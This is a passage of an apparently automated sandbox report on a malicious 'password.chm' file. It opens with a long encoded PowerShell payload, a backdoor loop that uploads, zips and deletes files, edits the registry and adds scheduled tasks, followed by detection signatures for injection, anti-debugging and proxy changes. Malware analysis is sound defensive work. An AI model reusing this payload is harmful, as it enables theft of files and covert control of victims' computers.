ATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwBCAGEAaQBVAEgAVQBRAGIAegBRAEoAQQBzACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABpAHIAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAUQBCAGkAYQApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJAB5AHkAVQAgACsAIAAnAC4AegBpAHAAJwA7AEMAbwBtAHAAcgBlAHMAcwAtAEEAcgBjAGgAaQB2AGUAIAAkAFEAQgBpAGEAIAAkAGYAaQBsAGUAbgBhAG0AZQAgAC0ARgBvAHIAYwBlADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAZgBpAGwAZQBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBuAGEAbQBlADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFEAQgBpAGEAKQB7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAUQBCAGkAYQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAbwB3AG4AOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AHcAWQBsAGIAZABoAFUARgBEAGwAcgAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBnAGUAZABpAHQAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgAOAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVgBhAGwAdQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHQAYQBzAGsAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBuAGEAbQBlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADcAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAUQBCAGkAYQAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAWABUAGwAbAAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFUAbABVAG0ATAAgACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAJABYAFQAbABsADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAGUAbAA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFEAQgBpAGEAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA= filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 16, 2023, 2:57 p.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff90000 process_handle: 0xffffffffffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 16, 2023, 2:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Aug. 16, 2023, 2:57 p.m.	key_handle: 0x000000000000028c regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2560 resumed a thread in remote process 2672
Process injection	Process 2884 resumed a thread in remote process 3048
NtResumeThread Aug. 16, 2023, 3:04 p.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2672	1	0	0
NtResumeThread Aug. 16, 2023, 2:57 p.m.	thread_handle: 0x0000000000000370 suspend_count: 1 process_identifier: 3048	1	0	0

Creates a suspicious Powershell process (4 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-ep bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

password.chm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All